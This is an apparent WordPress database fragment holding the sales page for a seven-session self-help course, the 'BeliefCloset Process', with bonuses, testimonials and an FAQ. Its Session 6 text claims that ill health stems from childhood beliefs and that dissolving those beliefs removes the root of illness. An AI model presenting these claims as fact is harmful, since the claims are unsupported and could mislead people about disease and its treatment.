underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:10:52', '2014-12-14 19:10:52', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
